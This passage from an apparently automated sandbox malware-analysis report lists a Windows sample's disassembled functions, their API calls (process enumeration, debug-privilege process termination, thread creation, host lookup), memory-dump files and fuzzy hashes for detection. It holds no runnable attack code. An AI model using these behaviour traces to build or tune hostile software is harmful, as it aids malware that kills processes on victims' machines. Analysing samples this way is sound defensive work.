                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00D42F74
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                  • Opcode ID: f120f408960af7b49b3ccaecb6f1538bc6cd83310d3c0daa256ef523c49b718a
                                                                                                                                                                                                                                                                  • Instruction ID: 6e1a395d999097f7e3b3ae7cbdc811f8992a7282976026c75f03d2fe9a2d5ffb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f120f408960af7b49b3ccaecb6f1538bc6cd83310d3c0daa256ef523c49b718a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201B5306843147BFB106B699C8AF593F6ADF5DB61F500015F358EE1E0C9E16484CAB9
                                                                                                                                                                                                                                                                  Function 00D42150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00D41D95,?,?,00000000), ref: 00D42159
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00D41D95,?,?,00000000), ref: 00D42160
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D41D95,?,?,00000000), ref: 00D42175
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00D41D95,?,?,00000000), ref: 00D4217D
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00D41D95,?,?,00000000), ref: 00D42180
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D41D95,?,?,00000000), ref: 00D42190
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00D41D95,00000000,?,00D41D95,?,?,00000000), ref: 00D42198
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00D41D95,?,?,00000000), ref: 00D4219B
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00D421C1,00000000,00000000,00000000), ref: 00D421B5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                  • Opcode ID: da47bb0038d11c7236488e39faede95218d22c6bc80c9e61228624b17ee43fce
                                                                                                                                                                                                                                                                  • Instruction ID: 89002ae4a9c777ea6292b3e9ad83e2bb9564c638c300d843a2d8e8ea9502bf41
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da47bb0038d11c7236488e39faede95218d22c6bc80c9e61228624b17ee43fce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C01A8B5240304BFE610ABA5DC49F6B7BADEB88711F404411FA09DB2A1DA709844CA30
                                                                                                                                                                                                                                                                  Function 00D6AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00D4DDAC
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00D4DDBA
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DD87: CloseHandle.KERNEL32(00000000), ref: 00D4DE87
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D6ABCA
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D6ABDD
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D6AC10
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D6ACC5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00D6ACD0
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6AD21
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                  • Opcode ID: d192d36b2d6ec17f833693b105cf8af61b946874f65038d107bac5ca98e051ea
                                                                                                                                                                                                                                                                  • Instruction ID: bfa7d05bd31729cee03680be0b11cdfcc36174001447c6e8221d28917c46dd42
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d192d36b2d6ec17f833693b105cf8af61b946874f65038d107bac5ca98e051ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D61AD742042419FD710DF19C495F25BBE1AF54308F19849CE4AA9BBA3D771EC85CFA2
                                                                                                                                                                                                                                                                  Function 00D74322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D743C1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00D743D6
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D743F0
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D74435
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00D74462
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D74490
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                                                                                                                  • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                  • Opcode ID: 6baee746b23732f6000dbdf1133a3b4454374ad5c16538bbfb2279f1301a46f7
                                                                                                                                                                                                                                                                  • Instruction ID: 3a807c9f136701205215e67306e8b15e3b8e95fc7ab75521075e9f819d13b88b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6baee746b23732f6000dbdf1133a3b4454374ad5c16538bbfb2279f1301a46f7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E241D271940319ABDF229F64CC49BEA7BA9FF08350F144526F94CE7291E7719980DBB0
                                                                                                                                                                                                                                                                  Function 00D4C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D4C6C4
                                                                                                                                                                                                                                                                  • IsMenu.USER32(00000000), ref: 00D4C6E4
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00D4C71A
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(01736BD0), ref: 00D4C76B
                                                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(01736BD0,?,00000001,00000030), ref: 00D4C793
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                  • String ID: 0$2
                                                                                                                                                                                                                                                                  • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                  • Opcode ID: d4246b301f2cc7febb2e36f38bca982924744319bf488e1efd4cdac488f80ea3
                                                                                                                                                                                                                                                                  • Instruction ID: a7f1e1c4e8467081b2283921b6be345546aed856d03fea7a79f05f324a83f1fa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4246b301f2cc7febb2e36f38bca982924744319bf488e1efd4cdac488f80ea3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1951BF706122059BDF60CF68C888BAEBBF5EF45318F28911AE955D7291E3709D41CF71
                                                                                                                                                                                                                                                                  Function 00D4D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00D4D1BE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                  • Opcode ID: 039eb2ae1182878504e2086b5df0848ef70e50cc6c498982995b4e8a35eb9e59
                                                                                                                                                                                                                                                                  • Instruction ID: 05dfc24d09924817c21b38a832b685cdc82160a9b76680e3957b2bc593b69991
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 039eb2ae1182878504e2086b5df0848ef70e50cc6c498982995b4e8a35eb9e59
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D311D67674C306BFEB056B54DC82EAA77ADDF16760F20002AFD09E62C1E7B4AE405170
                                                                                                                                                                                                                                                                  Function 00D4E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                  • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                  • Opcode ID: 20e66f55875080c69adc8f755b82742dd871c33a22e0cd86a8a327a83d1b665d
                                                                                                                                                                                                                                                                  • Instruction ID: 1e92f4b14c802b3fdf683508a009af93bc3640305d2364f64ce5be2950e22abd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20e66f55875080c69adc8f755b82742dd871c33a22e0cd86a8a327a83d1b665d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B11B4719002157FDB246B60DC4AFEA77BCEF41720F040069F649E6091FEB49A81CAB1
                                                                                                                                                                                                                                                                  Function 00D4F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 952045576-0
                                                                                                                                                                                                                                                                  • Opcode ID: dd05089576047205f6b780d79c28cf7a62b40f7cf66b6e41b6ab78e8e02d04e1
                                                                                                                                                                                                                                                                  • Instruction ID: 7b3e757129b321e65d756ae98be9dff8eea054403f3fc1bcd563896ae6752fa0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd05089576047205f6b780d79c28cf7a62b40f7cf66b6e41b6ab78e8e02d04e1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7416266C11218BADB11EBF88C86BCFB7A8EF05310F518462E51CE3161FA35D265C3B6
                                                                                                                                                                                                                                                                  Function 00CFFBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00CFFC41
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00D3FC15
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00D3FC98
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                  • Opcode ID: a45846e986b851cb9b46c488890e4837a87900c2f637544d7e999b645b3454b0
                                                                                                                                                                                                                                                                  • Instruction ID: 168d033f3ccd1774119b5e67d1c707e80a261e94ccdf55a6aa30a1835840dac4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a45846e986b851cb9b46c488890e4837a87900c2f637544d7e999b645b3454b0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C410C3150839C9AC7798B39C9887397FA1EF46350F18453CEB9B86B60D631A982D732
                                                                                                                                                                                                                                                                  Function 00D7379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D737B7
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D737BF
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D737CA
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00D737D6
                                                                                                                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D73812
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D73823
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D76504,?,?,000000FF,00000000,?,000000FF,?), ref: 00D7385E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D7387D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5122a16d56307b8d0b04b61ea1a18070c97cec14b703febcd78f5ee5ac2cbe74
                                                                                                                                                                                                                                                                  • Instruction ID: c1057ce645c5e295d3518a0f119020293116b3a4e7925fc02c5ac887ad685a4c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5122a16d56307b8d0b04b61ea1a18070c97cec14b703febcd78f5ee5ac2cbe74
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3317C72201214ABEB154F50CC89FEB3BAAEF49711F044065FE0DDA291E6B59881C7B0
                                                                                                                                                                                                                                                                  Function 00D65A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                                                                                                                                                  • Opcode ID: 24e9f0c97745c4c900e1b86ce45ddedfdc961e64b32315dce750e0bd65c2864f
                                                                                                                                                                                                                                                                  • Instruction ID: e3443b758c3484433fd4ed4092a9d458cce07a8039806abbfbe54f19bbae8307
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24e9f0c97745c4c900e1b86ce45ddedfdc961e64b32315dce750e0bd65c2864f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1D19071A0060A9FDF10CF68D885BAEB7B5FF48314F188169E915AB285E770ED85CB70
                                                                                                                                                                                                                                                                  Function 00D218A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00D2194E
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D219D1
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00D21B7B,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D21A64
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D21A7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00D21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D21AF7
